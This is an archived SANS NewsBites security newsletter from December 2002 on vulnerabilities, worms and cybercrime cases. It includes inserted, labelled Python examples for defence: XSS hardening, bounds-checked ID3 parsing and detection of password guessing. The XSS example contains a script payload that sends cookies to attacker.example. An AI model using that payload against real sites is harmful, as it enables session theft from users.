From: The SANS Institute (NewsBites_at_sans.org)
Date: Mon Dec 23 2002 - 20:36:11 CST

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    ***********************************************************************
    SANS NewsBites December 23, 2002 Vol. 4, Num. 52
    ***********************************************************************

    TOP OF THE NEWS
    20 December 2002 Report Says Cyberterrorism is Overhyped
    19 December 2002 President Bush Signs e-Government Act
    16 December 2002 Software Company Files Suit Over Vulnerability
                      Disclosure

    THE REST OF THE WEEK'S NEWS
    20 December 2002 Welsh Man Admits Authoring Three Viruses
    19 December 2002 Cross-Site Scripting Vulnerability on Cisco.com
    19 December 2002 NamesDirect.com Customer Info Exposed
    18 December 2002 e-Clearance Initiative on Target
    18 & 19 December 2002 Windows XP Vulnerability
    16 & 17 December 2002 CERT/CC Warns of SSH Vulnerabilities
    18 December 2002 Fix Available for Macromedia Flash Vulnerability
    18 December 2002 RealNetworks Releases Fix
    18 December 2002 Former Employee Charged with Cyber Sabotage
    18 December 2002 Man Takes Control of al Qaeda Sites
    17 & 18 December 2002 Iraq_Oil Worm
    17 December 2002 Revised Cyberspace Strategy Due
    17 December 2002 Survey Finds Surfing Opens Companies Up to Viruses
    17 December 2002 Another Phony eBay Site Tries to Gather Personal Data
    16 & 20 December 2002 CA HS Student Hacks School Computer for Project
    16 December 2002 DEA Agent Who Sold Data Receives Prison Sentence

    *************** This issue sponsored by SANS 2003 *******************

    Why Do People Come Back Year After Year To SANS Annual Conferences?

    "No other organization delivers courses with the technical detail,
    organization and 'mentoring' that SANS provides. Many conferences turn
    out to be very expensive marketing messages. SANS' vendor neutral
    approach assures that I get the info that will best protect/support
    my network. Ultimately, I come away from the conference a little more
    paranoid but much better armed to protect my system."
    (Tom E. Gonzales, Colorado State Employees Credit Union)

    "The one primary reason that I keep coming back to SANS events is
    the quality of the faculty."
    (Jim Clausing, AT&T)

    Early registration earns free bonus book: http://www.sans.org/SANS2003

    ***********************************************************************
    TOP OF THE NEWS

     --20 December 2002 Report Says Cyberterrorism is Overhyped
    A report for the Center for Strategic and International Studies says
    that the threat of cyberterrorism is over-hyped, calling such threats
    "weapons of mass annoyance" and comparing them to delayed flights
    and dropped phone calls: the country's critical infrastructure is
    accustomed to dealing with disruptions of that scale. Jim Lewis, who
    compiled the report, allows that a cyber attack in concert with a
    physical attack could compound the effects.
    http://www.wired.com/news/infostructure/0,1377,56935,00.html
    [Editor's Note (Schultz): I'm in full agreement with Mr. Lewis. I'm
    sure that a genuine cyberterrorism threat exists, but it has been blown
    far out of proportion. "Crying wolf" in the information security arena
    is no new problem, but the events of September 11 have, unfortunately,
    given impetus to louder and more extreme rhetoric.]

     --19 December 2002 President Bush Signs e-Government Act
    The E-Government Act of 2002 has been signed into law; among other
    provisions is a requirement that agencies test their systems for
    security problems and address those they find.
    http://www.eweek.com/article2/0,3959,794660,00.asp
    [Editor's Note (Paller): Two contracting changes in the new law will
    impact many government contractors: (1) contractors may take home a
    share of the savings their e-Gov systems provide to the government, and
    (2) security contractors that have the technical skills to fix security
    vulnerabilities such as configuration flaws and perimeter errors will
    take most of the contracts away from traditional contractors that can
    only test for vulnerabilities but do not have the certified skills
    needed to fix them. A listing of contractors with relevant skills
    will help agencies choose effective contractors.]

     --16 December 2002 Software Company Files Suit Over Vulnerability
                         Disclosure
    AutoProf.Com Inc., a New Hampshire software company, published a
    white paper in July describing vulnerabilities in a tool from Florida
    software company ScriptLogic Corp. ScriptLogic has filed a federal
    lawsuit accusing the Portsmouth-based company of violating copyright
    law and license agreements, and asks that AutoProf pay $75,000 in
    damages and withdraw the white paper. AutoProf and ScriptLogic are
    competitors. The case underscores the need for vulnerability
    disclosure guidelines.
    http://www.gcn.com/21_34/security/20634-1.html

    THE REST OF THE WEEK'S NEWS

     --20 December 2002 Welsh Man Admits Authoring Three Viruses
    Simon Vallor of Wales has admitted to creating and spreading three
    computer viruses, Gokar, Redesi and Admirer. Vallor has been released
    on bail pending sentencing.
    http://www.msnbc.com/news/850111.asp?0dm=T22BT
    http://www.theregister.co.uk/content/55/28659.html

     --19 December 2002 Cross-Site Scripting Vulnerability on Cisco.com
    The cisco.com web site is vulnerable to cross-site scripting, according
    to an advisory from online security portal Securiteam.com. A cross-site
    scripting flaw lets an attacker run script in a victim's browser in the
    context of the vulnerable site, typically to steal the session cookies
    or credentials that would let the attacker log in to the site as that
    victim.
    http://www.zdnet.com.au/newstech/security/story/0,2000024985,20270791,00.htm
    [Editor's Note (Ranum): Yet another example of "security researchers"
    hyping someone's vulnerability to market themselves. This is the
    kind of thing that, if someone really wanted to help, would have
    been cleared up quietly with a minimum of fuss and no need for a
    self-serving grab at headlines. As long as the press continues to
    reward this kind of behavior with headlines, we'll see this kind
    of behavior.
    My remarks about this same topic in the December 12 issue
    of NewsBites shouldn't be construed as an attack directed
    at ISS; my issue is with the disclosure-as-marketing
    phenomenon. For a good counterpoint, there is an article at
    http://www.issadvisor.com/viewtopic.php?t=41 that advocates the ISS
    approach to vulnerability disclosure and discusses making the vendors
    more accountable. For those following the vulnerability disclosure
    saga, it's a worthwhile read. Robert Graham, Chris Klaus and I
    have been carrying on an amiable private debate via Email on this
    topic. Robert's posted a good opinion piece on his web site (see:
    http://www.robertgraham.com/journal/021219-countercounterpoint.html )]
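    The mechanism behind the item above, as an added example that is not
    part of the original newsletter, the Securiteam advisory or cisco.com:
    a search page that echoes a query parameter unencoded, beside the same
    page with output encoding. The site name, the parameter "q", the
    attacker host and the payload are all constructed for this example.

```python
"""Reflected cross-site scripting: the unsafe echo beside the encoded one.

Added example. The search page, the parameter name 'q', the attacker host and
the payload are all constructed here; none of it comes from the Securiteam
advisory or from cisco.com.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link: 'q' carries script that sends the victim's
# cookies (typically the session token) to a host the attacker controls.
ATTACK_URL = (
    "http://search.example.com/search?q="
    "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2Fc%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url, name="q"):
    """Pull one query parameter out of a URL the way a search handler would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(q):
    """Echoes the raw parameter into the page: the defect behind reflected XSS.
    A victim who follows ATTACK_URL runs the attacker's script in the site's
    origin, so it can read cookies and make requests as that user."""
    return "<h1>Results for %s</h1>" % q


def render_hardened(q):
    """Same page with output encoding. '<', '>', '&' and quotes become entities,
    so the browser renders the payload as text instead of executing it."""
    return "<h1>Results for %s</h1>" % html.escape(q, quote=True)


def session_cookie_header(token):
    """Defence in depth: an HttpOnly, Secure session cookie is not readable by
    script, so even an XSS that slips through cannot exfiltrate it through
    document.cookie (it can still act on the user's behalf in-page)."""
    return "Set-Cookie: SESSION=%s; Path=/; Secure; HttpOnly" % token


def contains_script_tag(page):
    """Crude marker used only to contrast the two renderers above."""
    return "<script" in page.lower()


if __name__ == "__main__":
    q = query_param(ATTACK_URL)
    print("vulnerable:", render_vulnerable(q))
    print("hardened:  ", render_hardened(q))
    print(session_cookie_header("example-token"))
```

    The encoding must match where the value lands: html.escape is right
    for HTML body text as here, while attribute values, URLs and script
    blocks each need their own encoder. The HttpOnly flag limits what a
    successful injection can steal; it does not remove the injection.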

     --19 December 2002 NamesDirect.com Customer Info Exposed
    A website administrator and customer of NamesDirect.com discovered
    company log-in credentials that provided access to large quantities of
    sensitive customer data, including names associated with registered
    domains, home addresses, credit card numbers and expiration dates.
    The log-in information was present on 13 web pages and, furthermore,
    was quite easily guessed. The administrator tried to let the company
    know about the problem, but the company didn't fix it, so he took the
    information to CardCops.com, which in turn told MSNBC.com; only when
    MSNBC.com contacted the company was the problem finally addressed.
    http://www.msnbc.com/news/849290.asp

     --18 December 2002 e-Clearance Initiative on Target
    The Office of Personnel Management (OPM) is taking steps to speed
    up federal employee security clearances; the most commonly used
    clearance forms are expected to be available online soon. The OPM is
    heading up the e-Clearance e-Government initiative, which should be
    complete by May 2003.
    http://www.fcw.com/fcw/articles/2002/1216/web-opm-12-18-02.asp
    [Editor's Note (Northcutt): The security risks of this are obvious as
    evidenced by the story above. This is made even more interesting since
    OPM intends to link to the DoD clearance adjudication service. What a
    juicy target, all the information about people trusted with sensitive
    information including the "dirt".
    (Shpantzer): As the DEA and UBS stories in this issue demonstrate,
    security eventually hinges on the trustworthiness and reliability of
    personnel with high levels of privilege. Streamlining the clearance
    process while maintaining thoroughness is important because many
    sensitive IT projects are not fully staffed due to investigative
    backlogs.]

     --18 & 19 December 2002 Windows XP Vulnerability
    An unchecked buffer in the Windows Shell code that extracts attribute
    information from audio files could allow a specially crafted MP3 or
    WMA file to execute arbitrary code with the privileges of the logged-on
    user when Windows XP reads the file's attributes, for example when the
    folder containing it is browsed in Explorer. Microsoft has rated the
    flaw "critical" and has released a patch for it.
    http://www.msnbc.com/news/849418.asp?0dm=C24BT
    http://news.com.com/2100-1001-978403.html
    http://www.wired.com/news/technology/0,1282,56924,00.html
    http://www.eweek.com/article2/0,3959,795100,00.asp
    http://www.computerworld.com/securitytopics/security/holes/story/0,10801,76935,00.html
    http://www.cert.org/advisories/CA-2002-37.ht
    Microsoft bulletin:
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-072.asp
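    The bug class behind this bulletin is a parser that trusts a length
    field in the file and copies that many bytes into a fixed-size buffer.
    As an added example, not Microsoft's code and not taken from the
    bulletin, the following reads ID3v2.3 text frames (the attribute data
    an MP3 carries) with the checks such a copy needs. That ID3v2 tags are
    the attribute source is an assumption of this example; the sample tags,
    including a crafted one whose frame claims far more data than it holds,
    are constructed inline.

```python
"""Bounds-checked reading of ID3v2.3 text frames, the attribute data a file
manager extracts from MP3 files.

Added example, not Microsoft's code. MS02-072 describes an unchecked buffer
in the Windows Shell routine that extracts attribute information from audio
files; the assumption here is that ID3v2 tags are the attribute source, and
every sample tag is constructed below. The checks are the ones a fixed-size
destination buffer needs before any copy happens.
"""
import struct

ID3_HEADER_LEN = 10
FRAME_HEADER_LEN = 10
MAX_TEXT_LEN = 256       # per-field budget a shell extension might allot


class MalformedTag(ValueError):
    """Raised for any length claim the bytes in hand cannot satisfy."""


def _syncsafe(n):
    """Encode n as four 7-bit bytes (the ID3v2 header size format)."""
    return bytes(((n >> s) & 0x7F) for s in (21, 14, 7, 0))


def _unsyncsafe(b):
    if any(x & 0x80 for x in b):
        raise MalformedTag("header size byte has bit 7 set")
    return (b[0] << 21) | (b[1] << 14) | (b[2] << 7) | b[3]


def build_tag(frames):
    """Build an ID3v2.3 tag from {frame_id: latin-1 bytes} (constructed input)."""
    body = b""
    for fid, text in frames.items():
        data = b"\x00" + text          # leading 0x00 = ISO-8859-1 encoding
        body += fid.encode("ascii") + struct.pack(">I", len(data)) + b"\x00\x00" + data
    return b"ID3\x03\x00\x00" + _syncsafe(len(body)) + body


def crafted_oversized_frame():
    """A tag whose TIT2 frame claims 0x7FFFFFFF data bytes it does not carry.
    A parser that trusts the size field and copies into a fixed buffer
    reads (and writes) far past what it was given."""
    body = b"TIT2" + struct.pack(">I", 0x7FFFFFFF) + b"\x00\x00" + b"\x00pwn"
    return b"ID3\x03\x00\x00" + _syncsafe(len(body)) + body


def parse_text_frames(buf, max_text_len=MAX_TEXT_LEN):
    """Return {frame_id: text} for T*** frames, refusing any size that does not
    fit the bytes actually present or the per-field budget."""
    if len(buf) < ID3_HEADER_LEN or buf[:3] != b"ID3":
        raise MalformedTag("no ID3v2 header")
    if buf[3] != 3:
        raise MalformedTag("unsupported ID3v2.%d tag" % buf[3])
    tag_size = _unsyncsafe(buf[6:10])
    end = ID3_HEADER_LEN + tag_size
    if end > len(buf):
        raise MalformedTag("tag size claims more bytes than the file holds")
    pos = ID3_HEADER_LEN
    out = {}
    while pos + FRAME_HEADER_LEN <= end:
        fid = buf[pos:pos + 4]
        if fid == b"\x00\x00\x00\x00":
            break                                   # padding, nothing more
        size = struct.unpack(">I", buf[pos + 4:pos + 8])[0]
        data_start = pos + FRAME_HEADER_LEN
        if size > end - data_start:                 # the unchecked-length bug class
            raise MalformedTag("%r claims %d bytes, only %d remain"
                               % (fid, size, end - data_start))
        data = buf[data_start:data_start + size]
        if fid[:1] == b"T" and fid.isalnum():
            if not data:
                raise MalformedTag("%r text frame has no encoding byte" % fid)
            if data[0] != 0:
                raise MalformedTag("only ISO-8859-1 text handled in this example")
            text = data[1:]
            if len(text) > max_text_len:            # the fixed-buffer budget
                raise MalformedTag("%r text exceeds %d-byte budget" % (fid, max_text_len))
            out[fid.decode("ascii")] = text.rstrip(b"\x00").decode("latin-1")
        pos = data_start + size
    return out


def is_rejected(buf):
    """True when the parser refuses buf; what a scanner would key on."""
    try:
        parse_text_frames(buf)
    except MalformedTag:
        return True
    return False


if __name__ == "__main__":
    print(parse_text_frames(build_tag({"TIT2": b"Iraq_Oil", "TPE1": b"Nobody"})))
    print("oversized frame rejected:", is_rejected(crafted_oversized_frame()))
```

    Three lengths are checked against three different limits: the tag
    size against the bytes on hand, each frame size against the bytes
    left in the tag, and each text field against the destination budget.
    Skipping any one of them is the shape of the flaw the bulletin patches.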

     --16 & 17 December 2002 CERT/CC Warns of SSH Vulnerabilities
    The Computer Emergency Response Team Coordination Center (CERT/CC) has
    issued an advisory warning of a number of vulnerabilities in secure
    shell (SSH) protocol implementations, affecting both SSH clients and
    servers. The vulnerabilities lie in connection setup and key exchange,
    so they are reachable before any user authentication takes place, and
    could allow arbitrary code execution or denial of service. CERT/CC
    recommends applying appropriate vendor patches and limiting SSH server
    access.
    http://www.cert.org/advisories/CA-2002-36.html
    http://www.nwfusion.com/news/2002/1217certwarns.html
    http://www.zdnet.com.au/newstech/security/story/0,2000024985,20270730,00.htm

     --18 December 2002 Fix Available for Macromedia Flash Vulnerability
    Macromedia has released a new version of its Flash multimedia player
    that addresses an overflow vulnerability that could be used to run
    malicious code. Users running versions older than 6.0.65.0 are
    encouraged to upgrade to the new edition, which is available on
    Macromedia's web site.
    http://www.pcworld.com/news/article/0,aid,108033,00.asp
    http://news.zdnet.co.uk/story/0,,t269-s2127715,00.html

     --18 December 2002 RealNetworks Releases Fix
    RealNetworks has released updates for buffer overflow flaws in its
    RealOne Player products. A fix RealNetworks released several weeks
    ago was itself found to be vulnerable.
    http://www.eweek.com/article2/0,3959,793593,00.asp

     --18 December 2002 Former Employee Charged with Cyber Sabotage
    Former UBS PaineWebber system administrator Roger Duronio has been
    charged with sabotaging company computer systems in an attempt
    to manipulate its stock price. Duronio allegedly planted logic bombs
    that deleted files on the computers. He has been charged with one
    count of securities fraud and one count of violating the Computer
    Fraud and Abuse Act.
    http://news.com.com/2100-1001-978386.html
    http://www.philly.com/mld/inquirer/news/local/4763384.htm
    http://www.theregister.co.uk/content/55/28630.html
    [Editor's Note (Shpantzer): Separation of privilege is one of the most
    important principles in security. How did this person gain access to
    1,000 systems at branch offices across the country?]

     --18 December 2002 Man Takes Control of al Qaeda Sites
    A Minnesota man said he took control of two web addresses that had
    been used by al Qaeda to praise terrorist attacks. The man got the
    information he needed by breaking into the Hotmail account of someone
    listed as the contact for one of the sites. The man's actions have met
    with much criticism; some say that he is hindering the government's
    efforts to fight terrorism.
    http://www.wired.com/news/conflict/0,2100,56896,00.html
    [Editors' Note (Multiple): Sounds like he's also breaking the
    law. Self-appointed vigilantes ultimately cause more trouble than
    good.]

     --17 & 18 December 2002 Iraq_Oil Worm
    The W32/Lioten worm, also known as the Iraq_Oil worm, spreads through
    shared folders on Windows XP, NT and 2000. The worm scans for machines
    that answer on TCP port 445, the port used by Windows Server Message
    Block (SMB) file sharing, and when it gets a response it tries to
    break into the machine by brute-force password guessing.
    http://www.computerworld.com/securitytopics/security/virus/story/0,10801,76855,00.html
    http://news.zdnet.co.uk/story/0,,t269-s2127738,00.html
    [Editor's Note (Murray): If one must expose even a small part of one's
    file system to the public networks, one should not expose both read and
    write privileges on the same object. To do so invites the storage of
    contraband on one's system; worse, it invites this kind of mischief.]
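    The password-guessing step is where this worm shows up on a victim:
    a burst of failed logons from one source against several accounts,
    followed by a success. As an added example, not from the articles or
    from any antivirus vendor, the following Python flags that pattern in
    failed-logon records. The line format is invented for this example
    (event 529 is the NT/2000/XP Security log ID for a failed logon, 528
    for a successful one); the sample lines are constructed.

```python
"""Detecting Lioten-style SMB password guessing in failed-logon records.

Added example; the log format below is constructed for this example, not a
real Windows event log export. Real-world equivalents are Security events
529 (logon failure) and 528 (successful logon) on NT/2000/XP, with the
source workstation or address taken from the event body.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed sample: one source hammering several accounts on FS01, then
# getting in as 'backup'; plus a legitimate user who mistyped twice.
SAMPLE_LOG = """\
2002-12-17 10:00:01 host=FS01 event=529 src=10.0.0.23 user=administrator
2002-12-17 10:00:01 host=FS01 event=529 src=10.0.0.23 user=administrator
2002-12-17 10:00:02 host=FS01 event=529 src=10.0.0.23 user=guest
2002-12-17 10:00:02 host=FS01 event=529 src=10.0.0.23 user=backup
2002-12-17 10:00:03 host=FS01 event=529 src=10.0.0.23 user=jsmith
2002-12-17 10:00:03 host=FS01 event=529 src=10.0.0.23 user=mjones
2002-12-17 10:00:04 host=FS01 event=529 src=10.0.0.23 user=admin
2002-12-17 10:00:04 host=FS01 event=528 src=10.0.0.23 user=backup
2002-12-17 10:05:00 host=FS01 event=529 src=10.0.0.50 user=alee
2002-12-17 10:05:30 host=FS01 event=529 src=10.0.0.50 user=alee
2002-12-17 10:06:00 host=FS01 event=528 src=10.0.0.50 user=alee
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) host=(?P<host>\S+) "
    r"event=(?P<event>\d+) src=(?P<src>\S+) user=(?P<user>\S+)$"
)

FAILED_LOGON = "529"
SUCCESS_LOGON = "528"


def parse(log_text):
    """Yield one dict per line that matches the constructed format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
            yield rec


def find_guessing_sources(log_text, window=timedelta(seconds=60),
                          min_failures=5, min_accounts=3):
    """Return (flagged, compromised).

    flagged: {src: set(users)} for sources with >= min_failures failed logons
    against >= min_accounts distinct accounts inside any sliding `window`.
    A slow trickle of single typos never trips this; an enumerate-and-guess
    loop does. compromised: {(src, user)} successes from a flagged source,
    the case worth paging someone for.
    """
    recent = defaultdict(deque)      # src -> deque of (ts, user) failures
    flagged = {}
    compromised = set()
    for rec in parse(log_text):
        src, ts, user = rec["src"], rec["ts"], rec["user"]
        if rec["event"] == SUCCESS_LOGON:
            if src in flagged:
                compromised.add((src, user))
            continue
        if rec["event"] != FAILED_LOGON:
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()              # drop failures older than the window
        users = {u for _, u in q}
        if len(q) >= min_failures and len(users) >= min_accounts:
            flagged.setdefault(src, set()).update(users)
    return flagged, compromised


if __name__ == "__main__":
    flagged, compromised = find_guessing_sources(SAMPLE_LOG)
    for src, users in flagged.items():
        print("guessing from %s against %s" % (src, sorted(users)))
    for src, user in sorted(compromised):
        print("SUCCESS after guessing: %s as %s" % (src, user))
```

    The distinct-account threshold is what separates a worm walking a
    user list from one person fat-fingering a password; tune the window
    and counts to the share's normal failure rate before alerting on it.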

     --17 December 2002 Revised Cyberspace Strategy Due
    The revised version of the National Strategy to Secure Cyberspace
    is expected to be submitted for President Bush's approval soon.
    Among the changes in the document are increased responsibility
    placed on Internet service providers (ISPs) for ensuring networks are
    protected from cyber attacks, the need for improved wireless security
    and for private companies to be more forthcoming with information
    about computer vulnerabilities.
    http://www.govexec.com/dailyfed/1202/121702td2.htm
    [Editor's Note (Schultz): Requiring more responsibility on the part of
    ISP's is the most appropriate recommendation of all. ISPs have too long
    been a weak link, perhaps even the weakest link, in Internet security.
    (Murray): I agree. However, I think that it is important that we not
    give blanket endorsement to the government agenda. We should endorse
    ISP cooperation with warrants while resisting routine cooperation
    with warrantless, not to say unwarranted, queries.]

     --17 December 2002 Survey Finds Surfing Opens Companies Up to Viruses
    Websense's Australian 2002 WebWork report found that companies
    suffered virus infections as a result of employees surfing the web
    during work. Websense recommends that businesses have employees use
    their company e-mail account for personal correspondence rather than
    web-based e-mail services, as many of those services do not provide
    the virus protection afforded by the company's own e-mail systems.
    http://www.zdnet.com.au/newstech/hr/story/0,2000024989,20270733,00.htm
    [Editor's Note (Grefer): The report itself can be found at
    http://www.websense.com/company/news/research/Australian_WebWork_Survey_2002.doc
    How representative is a sample size of 143 technology professionals?
    For comparison, the corresponding U.S. and European reports are
    available at
    http://www.websense.com/company/news/research/webatwork2002.pdf
    http://www.websense.com/company/news/research/Internet_Misuse_Survey_2002.pdf]

     --17 December 2002 Another Phony eBay Site Tries to Gather Personal
                         Data
    For the third time in recent weeks, eBay customers have been targeted
    by a fraudulent site asking them to verify their account information;
    the operators of the sites harvest eBay usernames and passwords as
    well as credit card, banking, drivers' license and social security
    numbers. An eBay spokesman says the company never asks members for
    their passwords.
    http://www.vnunet.com/News/1137643

     --16 & 20 December 2002 CA HS Student Hacks School Computer for
                              Project
    A California high school student broke into the school's grades
    database and changed his GPA from a perfect 4.0 to a 1.9. Reid
    Ellison performed the intrusion as part of an approved project;
    Ellison provided the school with three pages of suggestions for
    improving its computer security.
    http://www.theregister.co.uk/content/55/28658.html
    http://www.siliconvalley.com/mld/siliconvalley/living/community/4754902.htm

     --16 December 2002 DEA Agent Who Sold Data Receives Prison Sentence
    Emilio Calatayud, formerly of the U.S. Drug Enforcement Administration
    (DEA), has received a 27-month prison sentence for selling information
    from three sensitive law enforcement databases to an investigative
    service. Calatayud will also pay a $5,000 fine.
    http://online.securityfocus.com/news/1847
    [Editor's Note (Murray): Sanctions for abuse of professional privileges
    should be harsher than the same acts committed by others. Abuse of
    law enforcement privileges must be harshly punished to preserve public
    trust and confidence in the rule of law.]

    ===end===

    NewsBites Editorial Board:
    Kathy Bradford, Roland Grefer, Bill Murray, Stephen Northcutt, Alan
    Paller, Marcus Ranum, Eugene Schultz and Gal Shpantzer

    Please feel free to share this with interested parties via email,
    but no posting is allowed on web sites. For a free subscription,
    (and for free posters) e-mail sans@sans.org with the subject:
    Subscribe NewsBites

    To update your address, visit http://www.sans.org/sansurl and enter
    your SD number (from the header of this email.) You will receive your
    personal URL via email.

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.1 (GNU/Linux)

    iD8DBQE+B6xf+LUG5KFpTkYRAlNiAKChBWtOZXbmWo9j4Hyewb9CPBbBkQCfQy+e
    vYLVJO2MFi6bjmQOk7XJBWU=
    =KbNN
    -----END PGP SIGNATURE-----